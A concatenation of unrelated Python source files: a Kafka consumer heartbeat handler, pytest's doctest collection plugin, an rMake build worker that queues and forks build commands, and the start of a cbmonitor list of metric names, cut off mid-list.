_f.add_callback(self._handle_heartbeat_response, future)
_f.add_errback(self._failed_request, self.coordinator_id,
request, future)
return future
def _handle_heartbeat_response(self, future, response):
#self.sensors.heartbeat_latency.record(response.requestLatencyMs())
error_type = Errors.for_code(response.error_code)
if error_type is Errors.NoError:
log.debug("Received successful heartbeat response.")
future.success(None)
elif error_type in (Errors.GroupCoordinatorNotAvailableError,
Errors.NotCoordinatorForGroupError):
log.info("Heartbeat failed: coordinator is either not started or"
" not valid; will refresh metadata and retry")
self.coordinator_dead()
future.failure(error_type())
elif error_type is Errors.RebalanceInProgressError:
log.info("Heartbeat failed: group is rebalancing; re-joining group")
self.rejoin_needed = True
future.failure(error_type())
elif error_type is Errors.IllegalGenerationError:
log.info("Heartbeat failed: local generation id is not current;"
" re-joining group")
self.rejoin_needed = True
future.failure(error_type())
elif error_type is Errors.UnknownMemberIdError:
log.info("Heartbeat failed: local member_id was not recognized;"
" resetting and re-joining group")
self.member_id = JoinGroupRequest.UNKNOWN_MEMBER_ID
self.rejoin_needed = True
future.failure(error_type)
elif error_type is Errors.GroupAuthorizationFailedError:
error = error_type(self.group_id)
log.error("Heartbeat failed: authorization error: %s", error)
future.failure(error)
else:
error = error_type()
log.error("Heartbeat failed: Unhandled error: %s", error)
future.failure(error)
class HeartbeatTask(object):
def __init__(self, coordinator):
self._coordinator = coordinator
self._heartbeat = coordinator.heartbeat
self._client = coordinator._client
self._request_in_flight = False
def reset(self):
# start or restart the heartbeat task to be executed at the next chance
self._heartbeat.reset_session_timeout()
try:
self._client.unschedule(self)
except KeyError:
pass
if not self._request_in_flight:
self._client.schedule(self, time.time())
def __call__(self):
if (self._coordinator.generation < 0 or
self._coordinator.need_rejoin() or
self._coordinator.coordinator_unknown()):
# no need to send the heartbeat we're not using auto-assignment
# or if we are awaiting a rebalance
log.debug("Skipping heartbeat: no auto-assignment"
" or waiting on rebalance")
return
if self._heartbeat.session_expired():
# we haven't received a successful heartbeat in one session interval
# so mark the coordinator dead
log.error("Heartbeat session expired - marking coordinator dead")
self._coordinator.coordinator_dead()
return
if not self._heartbeat.should_heartbeat():
# we don't need to heartbeat now, so reschedule for when we do
ttl = self._heartbeat.ttl()
log.debug("Heartbeat task unneeded now, retrying in %s", ttl)
self._client.schedule(self, time.time() + ttl)
else:
self._heartbeat.sent_heartbeat()
self._request_in_flight = True
future = self._coordinator._send_heartbeat_request()
future.add_callback(self._handle_heartbeat_success)
future.add_errback(self._handle_heartbeat_failure)
def _handle_heartbeat_success(self, v):
log.debug("Received successful heartbeat")
self._request_in_flight = False
self._heartbeat.received_heartbeat()
ttl = self._heartbeat.ttl()
self._client.schedule(self, time.time() + ttl)
def _handle_heartbeat_failure(self, e):
log.debug("Heartbeat failed; retrying")
self._request_in_flight = False
etd = time.time() + self._coordinator.config['retry_backoff_ms'] / 1000.0
self._client.schedule(self, etd)
'''
class GroupCoordinatorMetrics(object):
def __init__(self, metrics, prefix, tags=None):
self.metrics = metrics
self.group_name = prefix + "-coordinator-metrics"
self.heartbeat_latency = metrics.sensor("heartbeat-latency")
self.heartbeat_latency.add(metrics.metricName(
"heartbeat-response-time-max", self.group_name,
"The max time taken to receive a response to a heartbeat request",
tags), metrics.Max())
self.heartbeat_latency.add(metrics.metricName(
"heartbeat-rate", self.group_name,
"The average number of heartbeats per second",
tags), metrics.Rate(metrics.Count()))
self.join_latency = metrics.sensor("join-latency")
self.join_latency.add(metrics.metricName(
"join-time-avg", self.group_name,
"The average time taken for a group rejoin",
tags), metrics.Avg())
self.join_latency.add(metrics.metricName(
"join-time-max", self.group_name,
"The max time taken for a group rejoin",
tags), metrics.Avg())
self.join_latency.add(metrics.metricName(
"join-rate", self.group_name,
"The number of group joins per second",
tags), metrics.Rate(metrics.Count()))
self.sync_latency = metrics.sensor("sync-latency")
self.sync_latency.add(metrics.metricName(
"sync-time-avg", self.group_name,
"The average time taken for a group sync",
tags), metrics.Avg())
self.sync_latency.add(metrics.MetricName(
"sync-time-max", self.group_name,
"The max time taken for a group sync",
tags), metrics.Avg())
self.sync_latency.add(metrics.metricName(
"sync-rate", self.group_name,
"The number of group syncs per second",
tags), metrics.Rate(metrics.Count()))
"""
lastHeartbeat = Measurable(
measure=lambda _, value: value - heartbeat.last_heartbeat_send()
)
metrics.addMetric(metrics.metricName(
"last-heartbeat-seconds-ago", self.group_name,
"The number of seconds since the last controller heartbeat",
tags), lastHeartbeat)
"""
'''
|
|
""" discover and run doctests in modules and test files."""
from __future__ import absolute_import
import traceback
import pytest
from _pytest._code.code import TerminalRepr, ReprFileLocation, ExceptionInfo
from _pytest.python import FixtureRequest
def pytest_addoption(parser):
parser.addini('doctest_optionflags', 'option flags for doctests',
type="args", default=["ELLIPSIS"])
group = parser.getgroup("collect")
group.addoption("--doctest-modules",
action="store_true", default=False,
help="run doctests in all .py modules",
dest="doctestmodules")
group.addoption("--doctest-glob",
action="append", default=[], metavar="pat",
help="doctests file matching pattern, default: test*.txt",
dest="doctestglob")
group.addoption("--doctest-ignore-import-errors",
action="store_true", default=False,
help="ignore doctest ImportErrors",
dest="doctest_ignore_import_errors")
def pytest_collect_file(path, parent):
config = parent.config
if path.ext == ".py":
if config.option.doctestmodules:
return DoctestModule(path, parent)
elif _is_doctest(config, path, parent):
return DoctestTextfile(path, parent)
def _is_doctest(config, path, parent):
if path.ext in ('.txt', '.rst') and parent.session.isinitpath(path):
return True
globs = config.getoption("doctestglob") or ['test*.txt']
for glob in globs:
if path.check(fnmatch=glob):
return True
return False
class ReprFailDoctest(TerminalRepr):
def __init__(self, reprlocation, lines):
self.reprlocation = reprlocation
self.lines = lines
def toterminal(self, tw):
for line in self.lines:
tw.line(line)
self.reprlocation.toterminal(tw)
class DoctestItem(pytest.Item):
def __init__(self, name, parent, runner=None, dtest=None):
super(DoctestItem, self).__init__(name, parent)
self.runner = runner
self.dtest = dtest
self.obj = None
self.fixture_request = None
def setup(self):
if self.dtest is not None:
self.fixture_request = _setup_fixtures(self)
globs = dict(getfixture=self.fixture_request.getfuncargvalue)
self.dtest.globs.update(globs)
def runtest(self):
_check_all_skipped(self.dtest)
self.runner.run(self.dtest)
def repr_failure(self, excinfo):
import doctest
if excinfo.errisinstance((doctest.DocTestFailure,
doctest.UnexpectedException)):
doctestfailure = excinfo.value
example = doctestfailure.example
test = doctestfailure.test
filename = test.filename
if test.lineno is None:
lineno = None
else:
lineno = test.lineno + example.lineno + 1
message = excinfo.type.__name__
reprlocation = ReprFileLocation(filename, lineno, message)
checker = _get_checker()
REPORT_UDIFF = doctest.REPORT_UDIFF
if lineno is not None:
lines = doctestfailure.test.docstring.splitlines(False)
# add line numbers to the left of the error message
lines = ["%03d %s" % (i + test.lineno + 1, x)
for (i, x) in enumerate(lines)]
# trim docstring error lines to 10
lines = lines[example.lineno - 9:example.lineno + 1]
else:
lines = ['EXAMPLE LOCATION UNKNOWN, not showing all tests of that example']
indent = '>>>'
for line in example.source.splitlines():
lines.append('??? %s %s' % (indent, line))
indent = '...'
if excinfo.errisinstance(doctest.DocTestFailure):
lines += checker.output_difference(example,
doctestfailure.got, REPORT_UDIFF).split("\n")
else:
inner_excinfo = ExceptionInfo(excinfo.value.exc_info)
lines += ["UNEXPECTED EXCEPTION: %s" %
repr(inner_excinfo.value)]
lines += traceback.format_exception(*excinfo.value.exc_info)
return ReprFailDoctest(reprlocation, lines)
else:
return super(DoctestItem, self).repr_failure(excinfo)
def reportinfo(self):
return self.fspath, None, "[doctest] %s" % self.name
def _get_flag_lookup():
import doctest
return dict(DONT_ACCEPT_TRUE_FOR_1=doctest.DONT_ACCEPT_TRUE_FOR_1,
DONT_ACCEPT_BLANKLINE=doctest.DONT_ACCEPT_BLANKLINE,
NORMALIZE_WHITESPACE=doctest.NORMALIZE_WHITESPACE,
ELLIPSIS=doctest.ELLIPSIS,
IGNORE_EXCEPTION_DETAIL=doctest.IGNORE_EXCEPTION_DETAIL,
COMPARISON_FLAGS=doctest.COMPARISON_FLAGS,
ALLOW_UNICODE=_get_allow_unicode_flag(),
ALLOW_BYTES=_get_allow_bytes_flag(),
)
def get_optionflags(parent):
optionflags_str = parent.config.getini("doctest_optionflags")
flag_lookup_table = _get_flag_lookup()
flag_acc = 0
for flag in optionflags_str:
flag_acc |= flag_lookup_table[flag]
return flag_acc
class DoctestTextfile(DoctestItem, pytest.Module):
def runtest(self):
import doctest
fixture_request = _setup_fixtures(self)
# inspired by doctest.testfile; ideally we would use it directly,
# but it doesn't support passing a custom checker
text = self.fspath.read()
filename = str(self.fspath)
name = self.fspath.basename
globs = dict(getfixture=fixture_request.getfuncargvalue)
if '__name__' not in globs:
globs['__name__'] = '__main__'
optionflags = get_optionflags(self)
runner = doctest.DebugRunner(verbose=0, optionflags=optionflags,
checker=_get_checker())
parser = doctest.DocTestParser()
test = parser.get_doctest(text, globs, name, filename, 0)
_check_all_skipped(test)
runner.run(test)
def _check_all_skipped(test):
"""raises pytest.skip() if all examples in the given DocTest have the SKIP
option set.
"""
import doctest
all_skipped = all(x.options.get(doctest.SKIP, False) for x in test.examples)
if all_skipped:
pytest.skip('all tests skipped by +SKIP option')
class DoctestModule(pytest.Module):
def collect(self):
import doctest
if self.fspath.basename == "conftest.py":
module = self.config.pluginmanager._importconftest(self.fspath)
else:
try:
module = self.fspath.pyimport()
except ImportError:
if self.config.getvalue('doctest_ignore_import_errors'):
pytest.skip('unable to import module %r' % self.fspath)
else:
raise
# uses internal doctest module parsing mechanism
finder = doctest.DocTestFinder()
optionflags = get_optionflags(self)
runner = doctest.DebugRunner(verbose=0, optionflags=optionflags,
checker=_get_checker())
for test in finder.find(module, module.__name__):
if test.examples: # skip empty doctests
yield DoctestItem(test.name, self, runner, test)
def _setup_fixtures(doctest_item):
"""
Used by DoctestTextfile and DoctestItem to setup fixture information.
"""
def func():
pass
doctest_item.funcargs = {}
fm = doctest_item.session._fixturemanager
doctest_item._fixtureinfo = fm.getfixtureinfo(node=doctest_item, func=func,
cls=None, funcargs=False)
fixture_request = FixtureRequest(doctest_item)
fixture_request._fillfixtures()
return fixture_request
def _get_checker():
"""
Returns a doctest.OutputChecker subclass that takes in account the
ALLOW_UNICODE option to ignore u'' prefixes in strings and ALLOW_BYTES
to strip b'' prefixes.
Useful when the same doctest should run in Python 2 and Python 3.
An inner class is used to avoid importing "doctest" at the module
level.
"""
if hasattr(_get_checker, 'LiteralsOutputChecker'):
return _get_checker.LiteralsOutputChecker()
import doctest
import re
class LiteralsOutputChecker(doctest.OutputChecker):
"""
Copied from doctest_nose_plugin.py from the nltk project:
https://github.com/nltk/nltk
Further extended to also support byte literals.
"""
_unicode_literal_re = re.compile(r"(\W|^)[uU]([rR]?[\'\"])", re.UNICODE)
_bytes_literal_re = re.compile(r"(\W|^)[bB]([rR]?[\'\"])", re.UNICODE)
def check_output(self, want, got, optionflags):
res = doctest.OutputChecker.check_output(self, want, got,
optionflags)
if res:
return True
allow_unicode = optionflags & _get_allow_unicode_flag()
allow_bytes = optionflags & _get_allow_bytes_flag()
if not allow_unicode and not allow_bytes:
return False
else: # pragma: no cover
def remove_prefixes(regex, txt):
return re.sub(regex, r'\1\2', txt)
if allow_unicode:
want = remove_prefixes(self._unicode_literal_re, want)
got = remove_prefixes(self._unicode_literal_re, got)
if allow_bytes:
want = remove_prefixes(self._bytes_literal_re, want)
got = remove_prefixes(self._bytes_literal_re, got)
res = doctest.OutputChecker.check_output(self, want, got,
optionflags)
return res
_get_checker.LiteralsOutputChecker = LiteralsOutputChecker
return _get_checker.LiteralsOutputChecker()
def _get_allow_unicode_flag():
"""
Registers and returns the ALLOW_UNICODE flag.
"""
import doctest
return doctest.register_optionflag('ALLOW_UNICODE')
def _get_allow_bytes_flag():
"""
Registers and returns the ALLOW_BYTES flag.
"""
import doctest
return doctest.register_optionflag('ALLOW_BYTES')
|
|
#
# Copyright (c) SAS Institute Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
The worker is in charge of taking build requests and monitoring them
until they complete.
"""
import select
import time
import traceback
from rmake.lib import pipereader
from rmake.lib import server
from rmake import errors
from rmake import failure
from rmake.worker import command
from rmake.worker.chroot import rootmanager
class Worker(server.Server):
"""
The worker manages all operations that performed on an individual
package: currently resolving its dependencies and building it.
"""
# Plugins may override the command class used to perform a particular
# command by modifying this dict.
commandClasses = { 'build' : command.BuildCommand,
'load' : command.LoadCommand,
'resolve' : command.ResolveCommand,
'stop' : command.StopCommand,
'session' : command.SessionCommand,
#'image' : imagecommand.ImageCommand }
}
def __init__(self, serverCfg, logger, slots=1):
"""
param serverCfg: server.servercfg.rMakeConfiguration instance
param logger: lib.logger.Logger instance
param slots: number of commands that can be run at once
on this node.
"""
self.cfg = serverCfg
self.logger = logger
server.Server.__init__(self, logger)
self.cfg.checkBuildSanity()
self.idgen = CommandIdGen()
self.chrootManager = rootmanager.ChrootManager(self.cfg, self.logger)
self._foundResult = False
self._queuedCommands = [] # list of command classes + parameters
# for commands waiting to be run
self.commands = [] # list of command objects currently running
self.slots = slots
def hasActiveTroves(self):
return self.commands or self._queuedCommands
def buildTrove(self, buildCfg, jobId, trove, eventHandler,
buildReqs, crossReqs, targetLabel, logData=None,
logPath=None, commandId=None, builtTroves=None,
bootstrapReqs=()):
if not commandId:
commandId = self.idgen.getBuildCommandId(trove)
if logPath is None:
logPath = trove.logPath
if builtTroves is None:
builtTroves = []
chrootFactory = self.chrootManager.getRootFactory(buildCfg, buildReqs,
crossReqs, bootstrapReqs, trove)
self.queueCommand(self.commandClasses['build'], self.cfg, commandId,
jobId, eventHandler, buildCfg, chrootFactory,
trove, builtTroves, targetLabel, logData,
logPath)
def actOnTrove(self, commandClassName, buildCfg, jobId, trove,
eventHandler, logData=None, logPath=None, commandId=None):
if logPath is None:
logPath = trove.logPath
if not commandId:
commandId = self.idgen.getActionCommandId(commandClassName, trove)
self.queueCommand(self.commandClasses[commandClassName],
self.cfg, commandId,
jobId, eventHandler, buildCfg,
trove, logData, logPath)
def loadTroves(self, job, troveList, eventHandler, reposName,
commandId=None):
if commandId is None:
commandId = self.idgen.getLoadCommandId(job)
self.queueCommand(self.commandClasses['load'], self.cfg,
commandId, job.jobId, eventHandler, job, troveList, reposName)
def resolve(self, resolveJob, eventHandler, logData, commandId=None):
if not commandId:
commandId = self.idgen.getResolveCommandId(resolveJob.getTrove())
jobId = resolveJob.getTrove().jobId
self.queueCommand(self.commandClasses['resolve'], self.cfg, commandId,
jobId, eventHandler, logData, resolveJob)
def stopCommand(self, targetCommandId, commandId=None):
targetCommand = self.getCommandById(targetCommandId)
if not targetCommand:
self.warning('Asked to stop unknown command %s' % targetCommandId)
return
if not commandId:
commandId = self.idgen.getStopCommandId(targetCommandId)
def killFn(pid):
self._killPid(pid, killGroup=True,
hook=self._serveLoopHook)
self.runCommand(self.commandClasses['stop'], self.cfg, commandId,
targetCommand, killFn)
if targetCommand.trove:
targetCommand.trove.troveFailed('Stop requested')
elif targetCommand.job:
targetCommand.job.jobFailed('Stop requested')
else:
self.warning('Command %s has no job or trove assigned -- '
'cannot fail job.', targetCommandId)
def startSession(self, host, chrootPath, commandLine, superUser=False,
buildTrove=None):
if host != '_local_':
raise errors.RmakeError('Unknown host %s!' % host)
try:
chrootFactory = self.chrootManager.useExistingChroot(chrootPath,
useChrootUser=not superUser,
buildTrove=buildTrove)
commandId = self.idgen.getSessionCommandId(chrootPath)
cmd = self.runCommand(self.commandClasses['session'], self.cfg,
commandId, chrootFactory, commandLine)
except errors.RmakeError, err:
f = failure.ChrootFailed('%s: %s' % (chrootPath, err))
return False, f
while not cmd.getHostInfo() and not cmd.isErrored():
self.serve_once()
if cmd.isErrored():
return False, cmd.getFailureReason()
return True, cmd.getHostInfo()
def deleteChroot(self, host, chrootPath):
if host != '_local_':
raise errors.RmakeError('Unknown host %s!' % host)
self.chrootManager.deleteChroot(chrootPath)
def archiveChroot(self, host, chrootPath, newPath):
if host != '_local_':
raise errors.RmakeError('Unknown host %s!' % host)
return self.chrootManager.archiveChroot(chrootPath, newPath)
def queueCommand(self, commandClass, cfg, *args):
self._queuedCommands.append((commandClass, cfg, args))
def listChroots(self):
return self.chrootManager.listChroots()
def listChrootsWithHost(self):
return [('_local_', x) for x in self.chrootManager.listChroots()]
def _checkForResults(self):
return self._serveLoopHook()
def _serveLoopHook(self):
"""
Called to do maintenance inbetween accepting requests.
Checks for commands that have been added to the queue
and starts them running if there's space. Looks for
children that have died that were forked by this process
and handles them.
"""
# called once every .1 seconds when serving.
if self._queuedCommands and (len(self.commands) < self.slots):
commandTuple = self._queuedCommands.pop(0)
commandClass, cfg, args = commandTuple
if not self.runCommand(commandClass, cfg, *args):
self.queueCommand(commandClass, cfg, *args)
self._collectChildren()
if self._foundResult:
self._foundResult = False
return True
return False
def stopTroveLogger(self, trove):
if not hasattr(trove, 'logPid'):
return
pid = trove.logPid
if self._isKnownPid(pid):
self._killPid(pid)
def handleRequestIfReady(self, sleep=0.1):
"""
Called during serve loop to look for information being
returned from commands. Passes any read data to the local
command instance for parsing.
"""
# If a command involves forking, there are two versions of the
# command object: one kept in the worker, its sibling forked
# command that is doing the actual work. Information is passed
# back to the worker via pipes that are read here, and then
# parsed by the worker-held instance of the command.
ready = []
try:
ready = select.select(self.commands, [], [], sleep)[0]
except select.error, err:
pass
except IOError, err:
# this could happen because a pipe has been closed. In this
# case, we should notice the pid dying shortly anyway and
# we'll get our error message there.
pass
for command in ready:
# commands know how to handle their own information.
command.handleRead()
def listQueuedCommands(self):
return self._queuedCommands
def listCommands(self):
return self.commands
def getCommandById(self, commandId):
cmds = [ x for x in self.commands if x.getCommandId() == commandId]
if not cmds:
return None
else:
assert(len(cmds) == 1)
return cmds[0]
def runCommand(self, commandClass, cfg, commandId, *args):
"""
Start the given command by instantiating the given class.
Returns the command object that was created unless there
was an error instantiating the command object, in which
case None is returned.
The function may also return False, which means that the
command could not be run at this time (but did not error)
If the command is forked, then the command object is appended
the the list of running commands.
"""
command = None
try:
# errors before this point imply a problem w/ the node.
# Below this point it is a problem w/ the command.
command = commandClass(cfg, commandId, *args)
if not command.isReady():
return False
if command.shouldFork():
inF, outF = pipereader.makeMarshalPipes()
pid = self._fork('Command %s' % command.getCommandId())
if not pid:
try:
self._resetSignalHandlers()
inF.close()
command.setWritePipe(outF)
command.runCommandAndExit()
finally:
os._exit(1)
else:
command.pid = pid
outF.close()
command.setReadPipe(inF)
self.commands.append(command)
else:
command.runCommandNoExit()
self.commandCompleted(command.getCommandId())
except Exception, err:
self.error(
'Command %s got exception: %s: %s' % (commandId, err.__class__.__name__, err))
tb = traceback.format_exc()
self.commandErrored(commandId, str(err), tb)
if command:
command.commandErrored(str(err), tb)
return command
def _pidDied(self, pid, status, name=None):
"""
Called automatically from collectChildren, after a pid has
been collected through waitpid().
If the pid is for a command, then we call status functions,
commandCompleted and commandErrored, which can be overridden
by plugins.
"""
if name is None:
name = self._pids.get(pid, 'Unknown')
self.info('Pid %s (%s) died' % (pid, name))
for command in list(self.commands):
if pid == command.pid:
self._foundResult = True
command.commandDied(status)
if command.isErrored():
self.info('%s (Pid %s) errored' % (name, pid))
f = command.getFailureReason()
self.error(f)
self.commandErrored(command.getCommandId(), f)
else:
self.info('%s (Pid %s) completed' % (name, pid))
self.commandCompleted(command.getCommandId())
if command.getChrootFactory():
self.chrootManager.chrootFinished(
command.getChrootFactory().getRoot())
self.commands.remove(command)
break
server.Server._pidDied(self, pid, status, name)
def commandErrored(self, command, msg, tb=''):
pass
def commandCompleted(self, command):
pass
def stopAllCommands(self):
for command in self.commands:
self.stopCommand(command.commandId)
class CommandIdGen(object):
"""
Tracker and generator for command ids to ensure that each
commandId is unique.
"""
def __init__(self):
self._commandIds = {}
def getBuildCommandId(self, buildTrove):
str = 'BUILD-%s-%s' % (buildTrove.jobId, buildTrove.getName())
return self._getCommandId(str)
def getLoadCommandId(self, job):
str = 'LOAD-%s' % job.jobId
return self._getCommandId(str)
def getResolveCommandId(self, buildTrove):
str = 'RESOLVE-%s-%s' % (buildTrove.jobId, buildTrove.getName())
return self._getCommandId(str)
def getStopCommandId(self, targetCommandId):
str = 'STOP-%s' % (targetCommandId)
return self._getCommandId(str)
def getSessionCommandId(self, chrootPath):
str = 'SESSION-%s' % (chrootPath)
return self._getCommandId(str)
def getActionCommandId(self, commandClassName, trove):
str = '%s-%s-%s' % (commandClassName.upper(),
trove.jobId, trove.getName())
return self._getCommandId(str)
def _getCommandId(self, str):
self._commandIds.setdefault(str, 0)
self._commandIds[str] += 1
str += '-%s' % self._commandIds[str]
return str
|
|
from collections import OrderedDict, defaultdict, namedtuple
from cbmonitor import models
Observable = namedtuple(
"Observable", ["cluster", "server", "bucket", "index", "name", "collector"]
)
class Report(object):
"""Provide all existing observables that meet following requirements:
-- observable is in predefined dict of metrics (cls.METRICS)
-- observable belongs to snapshot (input parameter)
It supports arbitrary number of snapshots, each element includes a list of
observables, one observable per snapshot. Yield is skipped in case of full
snapshot mismatch (none of snapshot has corresponding observable object).
"""
METRICS = OrderedDict((
("active_tasks", [
"rebalance_progress",
"bucket_compaction_progress",
]),
("xdcr_lag", [
"xdcr_lag",
"xdcr_persistence_time",
"xdcr_diff",
]),
("sgimport_latency", [
"sgimport_latency",
]),
("spring_query_latency", [
"latency_query",
]),
("kvstore_stats", [
"BlockCacheQuota",
"WriteCacheQuota",
"BlockCacheMemUsed",
"BlockCacheHits",
"BlockCacheMisses",
"BloomFilterMemUsed",
"BytesIncoming",
"BytesOutgoing",
"BytesPerRead",
"IndexBlocksSize",
"MemoryQuota",
"NCommitBatches",
"NDeletes",
"NGets",
"NInserts",
"NReadBytes",
"NReadBytesCompact",
"NReadBytesGet",
"NReadIOs",
"NReadIOsGet",
"NSets",
"NSyncs",
"NTablesCreated",
"NTablesDeleted",
"NTableFiles",
"TableMetaMemUsed",
"NFileCountCompacts",
"NWriteBytes",
"NWriteBytesCompact",
"NWriteIOs",
"ReadAmp",
"ReadAmpGet",
"ReadIOAmp",
"BufferMemUsed",
"WALMemUsed",
"WALBufferMemUsed",
"TreeSnapshotMemoryUsed",
"ReadAheadBufferMemUsed",
"TableObjectMemUsed",
"WriteAmp",
"WriteCacheMemUsed",
"TotalBloomFilterMemUsed",
"NCompacts",
"TxnSizeEstimate",
"NFlushes",
"NGetsPerSec",
"NSetsPerSec",
"NDeletesPerSec",
"NCommitBatchesPerSec",
"NFlushesPerSec",
"NCompactsPerSec",
"NSyncsPerSec",
"NReadBytesPerSec",
"NReadBytesGetPerSec",
"NReadBytesCompactPerSec",
"BytesOutgoingPerSec",
"NReadIOsPerSec",
"NReadIOsGetPerSec",
"BytesIncomingPerSec",
"NWriteBytesPerSec",
"NWriteIOsPerSec",
"NWriteBytesCompactPerSec",
"RecentWriteAmp",
"RecentReadAmp",
"RecentReadAmpGet",
"RecentReadIOAmp",
"RecentBytesPerRead",
"NGetStatsPerSec",
"NGetStatsComputedPerSec",
"FlushQueueSize",
"CompactQueueSize",
"NBloomFilterHits",
"NBloomFilterMisses",
"BloomFilterFPR",
"NumNormalFlushes",
"NumPersistentFlushes",
"NumSyncFlushes",
"BlockCacheHitsPerSec",
"BlockCacheMissesPerSec",
"NBloomFilterHitsPerSec",
"NBloomFilterMissesPerSec",
"RecentBlockCacheHitRatio",
"BlockCacheHitRatio",
"ReadIOAmpSet",
"RecentReadIOAmpSet",
"NReadBytesSet",
"NReadIOsSet",
"NReadBytesSetPerSec",
"NReadIOsSetPerSec",
"ActiveIndexBlocksSize",
"NBlocksCached",
"CheckpointOverheadPeriod",
"CheckpointOverheadRatio",
]),
("cbstats_memory", [
"ep_mem_used_primary",
]),
("cbstats_all", [
"mem_used_secondary",
"ep_magma_total_mem_used",
"ep_magma_mem_used_diff",
]),
("n1ql_stats", [
"query_requests",
"query_selects",
"query_avg_req_time",
"query_avg_svc_time",
"query_avg_response_size",
"query_avg_result_count",
"query_errors",
"query_warnings",
"query_requests_250ms",
"query_requests_500ms",
"query_requests_1000ms",
"query_requests_5000ms",
"query_invalid_requests",
]),
("observe", [
"latency_observe",
]),
("durability", [
"latency_persist_to",
"latency_replicate_to",
]),
("fts_latency", [
"cbft_latency_get",
"elastic_latency_get",
"elastic_cache_hit",
"elastic_cache_size",
"elastic_filter_cache_size",
"elastic_active_search",
"elastic_query_total"
]),
("spring_latency", [
"latency_set",
"latency_get",
"latency_total_set",
"latency_total_get",
]),
("xdcr_stats", [
"changes_left",
"percent_completeness",
"docs_written",
"docs_filtered",
"docs_failed_cr_source",
"rate_replicated",
"bandwidth_usage",
"rate_doc_opt_repd",
"rate_doc_checks",
"wtavg_meta_latency",
"wtavg_docs_latency",
]),
("ns_server_system", [
"cpu_utilization",
]),
("ns_server", [
"ep_dcp_2i_items_sent",
"ep_dcp_2i_items_remaining",
"couch_views_ops",
"ops",
"cmd_get",
"cmd_set",
"delete_hits",
"cas_hits",
"xdc_ops",
"ep_num_ops_get_meta",
"ep_num_ops_set_meta",
"ep_num_ops_del_meta",
"curr_connections",
"curr_items",
"vb_replica_curr_items",
"vb_pending_curr_items",
"mem_used",
"ep_meta_data_memory",
"vb_active_resident_items_ratio",
"vb_replica_resident_items_ratio",
"ep_num_value_ejects",
"ep_tmp_oom_errors",
"ep_dcp_replica_items_remaining",
"ep_dcp_replica_total_bytes",
"ep_dcp_other_items_remaining",
"ep_dcp_other_total_bytes",
"disk_write_queue",
"ep_cache_miss_rate",
"ep_bg_fetched",
"ep_ops_create",
"vb_active_ops_create",
"vb_replica_ops_create",
"vb_pending_ops_create",
"ep_ops_update",
"vb_active_ops_update",
"vb_replica_ops_update",
"vb_pending_ops_update",
"ep_diskqueue_drain",
"ep_diskqueue_fill",
"ep_queue_size",
"avg_bg_wait_time",
"avg_disk_commit_time",
"avg_disk_update_time",
"vb_avg_total_queue_age",
"couch_docs_data_size",
"couch_docs_actual_disk_size",
"couch_views_data_size",
"couch_views_actual_disk_size",
"couch_total_disk_size",
"couch_docs_fragmentation",
"couch_views_fragmentation",
"cpu_utilization_rate",
"swap_used",
]),
("analytics", [
"heap_used",
"gc_count",
"gc_time",
"io_reads",
"io_writes",
"system_load_average",
"disk_used",
"thread_count",
]),
("fts_totals", [
"batch_merge_count",
"doc_count",
"iterator_next_count",
"iterator_seek_count",
"num_bytes_live_data",
"num_bytes_used_disk",
"num_files_on_disk",
"num_root_memorysegments",
"num_root_filesegments",
"num_mutations_to_index",
"num_pindexes",
"num_pindexes_actual",
"num_pindexes_target",
"num_recs_to_persist",
"reader_get_count",
"reader_multi_get_count",
"reader_prefix_iterator_count",
"reader_range_iterator_count",
"timer_batch_store_count",
"timer_data_delete_count",
"timer_data_update_count",
"timer_opaque_get_count",
"timer_opaque_set_count",
"timer_rollback_count",
"timer_snapshot_start_count",
"total_bytes_indexed",
"total_bytes_query_results",
"total_compactions",
"total_queries",
"total_queries_error",
"total_queries_slow",
"total_queries_timeout",
"total_request_time",
"total_term_searchers",
"writer_execute_batch_count",
"num_bytes_used_ram",
"pct_cpu_gc",
"total_gc",
]),
("fts_stats", [
"batch_merge_count",
"doc_count",
"iterator_next_count",
"iterator_seek_count",
"num_bytes_live_data",
"num_bytes_used_disk",
"num_files_on_disk",
"num_root_memorysegments",
"num_root_filesegments",
"num_mutations_to_index",
"num_pindexes",
"num_pindexes_actual",
"num_pindexes_target",
"num_recs_to_persist",
"reader_get_count",
"reader_multi_get_count",
"reader_prefix_iterator_count",
"reader_range_iterator_count",
"timer_batch_store_count",
"timer_data_delete_count",
"timer_data_update_count",
"timer_opaque_get_count",
"timer_opaque_set_count",
"timer_rollback_count",
"timer_snapshot_start_count",
"total_bytes_indexed",
"total_bytes_query_results",
"total_compactions",
"total_queries",
"total_queries_error",
"total_queries_slow",
"total_queries_timeout",
"total_request_time",
"total_term_searchers",
"writer_execute_batch_count",
"num_bytes_used_ram",
"pct_cpu_gc",
"total_gc",
]),
("eventing_stats", [
"DCP_MUTATION",
"DOC_TIMER_EVENTS",
"CRON_TIMER_EVENTS",
]),
("jts_stats", [
"jts_throughput",
"jts_latency",
]),
("eventing_per_node_stats", [
"DcpEventsRemaining",
]),
("eventing_per_handler_stats", [
"on_update_success"
]),
("eventing_consumer_stats", [
"eventing_consumer_rss",
"eventing_consumer_cpu",
]),
("secondary_stats", [
"index_items_count",
"index_num_docs_indexed",
"index_num_docs_pending",
"index_num_docs_queued",
"index_num_requests",
"index_num_rows_returned",
"index_scan_bytes_read",
"index_data_size",
"index_disk_size",
"index_fragmentation",
"index_total_scan_duration",
]),
("secondaryscan_latency", [
"Nth-latency",
]),
("secondary_debugstats", [
"num_connections",
"memory_used",
"memory_used_storage",
"memory_used_queue",
"average_indexer_resident_ratio"
]),
("secondary_debugstats_bucket", [
"mutation_queue_size",
"num_nonalign_ts",
"ts_queue_size",
]),
("secondary_debugstats_index", [
"avg_scan_latency",
"avg_scan_wait_latency",
"avg_ts_interval",
"avg_ts_items_count",
"disk_store_duration",
"flush_queue_size",
"num_compactions",
"num_completed_requests",
"num_rows_returned",
"num_rows_scanned_aggr",
"scan_cache_hit_aggr",
"timings_dcp_getseqs",
"timings_storage_commit",
"timings_storage_del",
"timings_storage_get",
"timings_storage_set",
"timings_storage_snapshot_create",
]),
("secondary_storage_stats", [
"MainStore_memory_size",
"MainStore_num_cached_pages",
"MainStore_num_pages",
"MainStore_num_pages_swapout",
"MainStore_num_pages_swapin",
